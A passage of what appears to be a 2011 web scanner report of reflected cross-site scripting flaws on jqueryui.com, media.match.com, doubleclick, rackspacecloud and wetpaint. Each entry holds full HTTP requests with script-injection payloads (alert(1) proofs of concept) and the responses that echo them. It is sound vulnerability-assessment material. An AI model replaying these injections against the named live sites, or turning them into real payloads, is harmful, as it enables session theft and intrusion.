Date: Sat, 05 Feb 2011 15:26:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40eb"><script>alert(1)</script>9eed84605e5 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30b40eb"><script>alert(1)</script>9eed84605e5&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e7eb"><script>alert(1)</script>0ffcdae2d95 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px9e7eb"><script>alert(1)</script>0ffcdae2d95&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 143e5"><script>alert(1)</script>b0bf9d965be was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965be HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:37 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:37 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:37 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4987
Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... ?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/143e5"><script>alert(1)</script>b0bf9d965behttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119127_728x90"> ...[SNIP]...
The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84aee'-alert(1)-'c49b8f1b23a was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23a HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:38 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4928
Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 14_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/84aee'-alert(1)-'c49b8f1b23ahttp://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90'); clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/1777 ...[SNIP]...
4.92. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://media.match.com
Path: /cookE/geoip/iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f6b"><script>alert(1)</script>f17304568b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:38 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:38 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:38 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4984
Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&20f6b"><script>alert(1)</script>f17304568b2=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90"> ...[SNIP]...
4.93. http://media.match.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://media.match.com
Path: /cookE/geoip/iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f94'-alert(1)-'1e9875c14ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:39 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:39 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:39 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4939
Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 4_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119125&ml_multiclick=clickTAG1&click=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/&18f94'-alert(1)-'1e9875c14ba=1http://www.match.com/qsearch/qsearchdl.aspx?trackingID=526520&sourceid=1088092_1088114_2119092_2119093_1088672_2119125_728x90'); clickTAGs += '&swfPATH=' + escape('http://media.match.com/xl/PROD/17 ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cbf1'%3balert(1)//38af7fabdfe was submitted in the target parameter. This input was echoed as 2cbf1';alert(1)//38af7fabdfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank2cbf1'%3balert(1)//38af7fabdfe&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:36 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4942
Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... 11ew_vsgeo_selectgenderzipbkgd_vpblubtn_110810_noy_728x90.swf'; var flash_name= '"' + swf_name + '"'; var swfVer= 80/10; var swfMime= 'application/x-shockwave-flash'; var clickTAGs= 'clickTARGET=_blank2cbf1';alert(1)//38af7fabdfe' + '&clickTAG=' + escape('http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&ml_multi ...[SNIP]...
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4913e"><script>alert(1)</script>2aae3020d1a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2119093_1088114_728x90_2119092_2119093&target=_blank4913e"><script>alert(1)</script>2aae3020d1a&@CPSC@=http://r.turn.com/r/formclick/id/MZ2eChVs_z9UPQAAcQABAA/url/ HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=24-476334273; CSList=1106746/1118931,0/0,0/0,0/0,0/0
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:36 GMT
Server: Apache/1.3.37 (Unix)
Set-Cookie: XGIR=5CUsgepa3+PaqVXC2CLAat|0e22et|Pn|JSlDJ|f5|lIY|ulr|-ruD|; path=/
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=24-476334273; expires=Fri, 05 Feb 2021 03:59:36 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088092/1088114,1106746/1118931,0/0,0/0,0/0; expires=Fri, 06 May 2011 15:59:36 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 4987
Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://media.match.com/image_htmlping?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&txn ...[SNIP]... <A TARGET="_blank4913e"><script>alert(1)</script>2aae3020d1a" HREF="http://media.match.com/click.ng?spacedesc=2119093_1088114_728x90_2119092_2119093&af=1088672&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2119093&ml_camp=1088092&ml_crid=2119127&click=http://r.turn.com/r/f ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>33aa020c94a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296921569996&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-5526064907005908&slotname=Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a&page_slots=Technology_HomePage_237Top2&cust_params=Pageview%3DHomePage%26Permission%3DReg-regcom%26Flagged%3DNo%26Topic%3DTechnology%26WikiName%3Dhtcwiki%26UserRole%3DAnonymous%26ReturnVisitor%3Dfalse%26IsWPUser%3Dfalse%26AgeGroup%3D%26Gender%3D&cookie_enabled=1&ga_vid=1442931598.1296921570&ga_sid=1296921570&ga_hid=33117073&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&lmt=1296943170&dt=1296921570006&cc=12&biw=985&bih=996&ifi=1&adk=1893771767&channel=1000006000%2C1000001000%2C1000003000%2C1000003001%2C1000006001%2C1000006002%2C1000000118%2C1000001018%2C1000003019%2C1000006019&hints=technology%2C%20electronics%2C%20PC%2C%20laptop%2C%20cell%20phone%2C%20smart%20phone%2C%20PDA%2C%20new%20technology%2C%20technology%20news%2C%20wireless%20technology%2C%20&ad_type=text&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 16:02:06 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1453
GA_googleSetAdContentsBySlotForSync({"Technology_HomePage_237Top2e774e<script>alert(1)</script>33aa020c94a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
4.97. https://signup.rackspacecloud.com/signup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://signup.rackspacecloud.com
Path: /signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833f8"><script>alert(1)</script>2f5afd2fed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signup?833f8"><script>alert(1)</script>2f5afd2fed7=1 HTTP/1.1
Host: signup.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Sat, 05 Feb 2011 15:25:22 GMT
Keep-Alive: timeout=15, max=139
Connection: close
Set-Cookie: symfony=3mbf46jt4ltiml2f8iqrbimlp5; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 17282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5 was submitted in the REST URL parameter 4. This input was echoed as 8cc9a<img src=a onerror=alert(1)>1b1cc5a4bc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /scripts/wpcss/skin/meadowgreen8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5/s.css?20110120041852 HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:00:20 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=1EF4A790692B899F9F7BAFD81DBBB10D; Path=/
Cache-Control: max-age=2592000
Expires: Mon, 07 Mar 2011 16:00:20 GMT
Vary: Accept-Encoding
Content-Type: text/css;charset=UTF-8
Content-Length: 4350
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db was submitted in the REST URL parameter 3. This input was echoed as c807d<img src=a onerror=alert(1)>89bbccc59db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /scripts/wpjsPage/pagec807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db/p.js?v=20110120041852 HTTP/1.1
Host: static.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F6E1F8144EB4CA5D1686E51986AC76AA; wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:38 GMT
Server: Apache
